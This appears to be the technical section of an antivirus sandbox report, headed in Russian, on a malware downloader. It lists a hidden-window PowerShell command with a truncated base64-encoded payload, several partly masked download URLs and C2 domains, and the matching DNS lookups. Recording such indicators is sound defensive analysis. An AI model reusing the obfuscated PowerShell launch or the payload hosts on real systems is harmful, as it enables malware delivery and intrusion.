Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAHoAeQBjAGwAdwBxAHQAawB4AHEAbABrAD0AJwBVAGkAdQBjAGYAagBzAHkAZAB2AGIAeABrACcAOwAkAEcAbwBsAGIAYwBuAGsAegBrACAAPQAgACcAMwA5ADAAJwA7ACQASQBpAHYAZQBnAGEAawB1AGoAeQByAD0AJwBQAGQAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\952947.cvr
- 'ca####etouch.com':80
- 'do####ico.com.br':80
- 'fh###ars.com':80
- 'be######ternasional.co.id':443
- 'bt##cum.pl':80
- 'bt##cum.pl':443
- http://ca####etouch.com/WdBpVei/
- http://do####ico.com.br/nVONNl/
- http://fh###ars.com/fvMlwS/
- http://bt##cum.pl/ww12/ck27ko74j-6tvpklk-0629309487/
- 'be######ternasional.co.id':443
- 'bt##cum.pl':443
- DNS ASK ca####etouch.com
- DNS ASK do####ico.com.br
- DNS ASK fh###ars.com
- DNS ASK be######ternasional.co.id
- DNS ASK bt##cum.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAHoAeQBjAGwAdwBxAHQAawB4AHEAbABrAD0AJwBVAGkAdQBjAGYAagBzAHkAZAB2AGIAeABrACcAOwAkAEcAbwBsAGIAYwBuAGsAegBrACAAPQAgACcAMwA5ADAAJwA7ACQASQBpAHYAZQBnAGEAawB1AGoAeQByAD0AJwBQAGQAYgB...' (со скрытым окном)